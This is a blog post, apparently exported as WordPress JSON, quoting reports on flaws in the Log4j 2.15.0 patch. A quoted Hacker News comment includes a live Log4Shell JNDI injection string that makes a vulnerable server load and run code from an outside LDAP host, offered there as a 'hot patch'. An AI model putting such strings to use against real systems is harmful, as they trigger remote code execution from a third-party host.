{"id":34460,"date":"2021-12-16T16:43:27","date_gmt":"2021-12-16T21:43:27","guid":{"rendered":"https:\/\/mjtsai.com\/blog\/?p=34460"},"modified":"2021-12-17T14:15:29","modified_gmt":"2021-12-17T19:15:29","slug":"log4j-fix-also-has-rce","status":"publish","type":"post","link":"https:\/\/mjtsai.com\/blog\/2021\/12\/16\/log4j-fix-also-has-rce\/","title":{"rendered":"Log4j Fix Also Has RCE"},"content":{"rendered":"<p><a href=\"https:\/\/arstechnica.com\/information-technology\/2021\/12\/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit\/\">Dan Goodin<\/a>:<\/p>\n<blockquote cite=\"https:\/\/arstechnica.com\/information-technology\/2021\/12\/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit\/\">\n<p>Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update.<\/p>\n<\/blockquote>\n\n<p><a href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day-update-on-cve-2021-45046\/\">LunaSec<\/a> (via <a href=\"https:\/\/news.ycombinator.com\/item?id=29561532\">Hacker News<\/a>):<\/p>\n<blockquote cite=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day-update-on-cve-2021-45046\/\"><p>After the log4j maintainers released version <code>2.15.0<\/code> to address the\n<a href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day\/\">Log4Shell vulnerability<\/a>, an additional attack vector\nwas identified and reported in <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046\">CVE-2021-45046<\/a>.<\/p><p>Our research into this shows that this new CVE invalidates previous mitigations used to protect versions\n<code>2.7.0 &lt;= Apache log4j &lt;= 2.14.1<\/code> from Log4Shell in some cases.<\/p><\/blockquote>\n\n<p><a href=\"https:\/\/news.ycombinator.com\/item?id=29562002\">freeqaz<\/a>:<\/p>\n<blockquote cite=\"https:\/\/news.ycombinator.com\/item?id=29562002\">\n<p>We also wrote a Log4Shell payload that will in-memory &ldquo;hot patch&rdquo; your server against Log4Shell.<\/p>\n<pre>${jndi:ldap:\/\/hotpatch.log4shell.com:1389\/a}<\/pre>\n<p>If you paste that into a vulnerable server (or even throw it into a log statement in your <code>main<\/code> function), that&rsquo;ll patch you against this until you can manage to update properly.<\/p>\n<\/blockquote>\n\n<p>See also: <a href=\"https:\/\/www.schneier.com\/blog\/archives\/2021\/12\/more-log4j-news.html\">Bruce Schneier<\/a>.<\/p>\n\n<p>Previously:<\/p>\n<ul>\n<li><a href=\"https:\/\/mjtsai.com\/blog\/2021\/12\/10\/log4shell-log4j-remote-code-execution\/\">Log4Shell: Log4j Remote Code Execution<\/a><\/li>\n<\/ul>\n\n<p>Update (2021-12-16): <a href=\"https:\/\/twitter.com\/rosyna\/status\/1471627924604293126\">Rosyna Keller<\/a>:<\/p>\n<blockquote cite=\"https:\/\/twitter.com\/rosyna\/status\/1471627924604293126\">\n<p>2.15.0 only had the DoS and data exfil bugs. 2.14.x and earlier have the RCE. 2.15.0 has no RCE. 2.16.0 fixes everything.<\/p>\n<\/blockquote>\n\n<p id=\"log4j-fix-also-has-rce-update-2021-12-17\">Update (2021-12-17): <a href=\"https:\/\/github.com\/fullhunt\/log4j-scan\">log4j-scan<\/a> (via <a href=\"https:\/\/twitter.com\/rosyna\/status\/1471914849412149248\">Rosyna Keller<\/a>):<\/p>\n<blockquote cite=\"https:\/\/github.com\/fullhunt\/log4j-scan\">\n<p>There is a patch bypass on Log4J v2.15.0 that allows a full RCE.<\/p>\n<\/blockquote>","protected":false},"excerpt":{"rendered":"<p>Dan Goodin: Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update. LunaSec (via Hacker News): After the log4j maintainers released version 2.15.0 to address the Log4Shell [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"apple_news_api_created_at":"2021-12-16T21:43:31Z","apple_news_api_id":"2be69e7a-e288-4acb-8799-2ef64fe936c1","apple_news_api_modified_at":"2021-12-17T19:15:36Z","apple_news_api_revision":"AAAAAAAAAAAAAAAAAAAAAg==","apple_news_api_share_url":"https:\/\/apple.news\/AK-aeeuKISsuHmS72T-k2wQ","apple_news_coverimage":0,"apple_news_coverimage_caption":"","apple_news_is_hidden":false,"apple_news_is_paid":false,"apple_news_is_preview":false,"apple_news_is_sponsored":false,"apple_news_maturity_rating":"","apple_news_metadata":"\"\"","apple_news_pullquote":"","apple_news_pullquote_position":"","apple_news_slug":"","apple_news_sections":"\"\"","apple_news_suppress_video_url":false,"apple_news_use_image_component":false,"footnotes":""},"categories":[4],"tags":[131,2095,84,71,48],"class_list":["post-34460","post","type-post","status-publish","format-standard","hentry","category-programming-category","tag-bug","tag-exploit","tag-java","tag-programming","tag-security"],"apple_news_notices":[],"_links":{"self":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts\/34460","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/comments?post=34460"}],"version-history":[{"count":4,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts\/34460\/revisions"}],"predecessor-version":[{"id":34488,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts\/34460\/revisions\/34488"}],"wp:attachment":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/media?parent=34460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/categories?post=34460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/tags?post=34460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}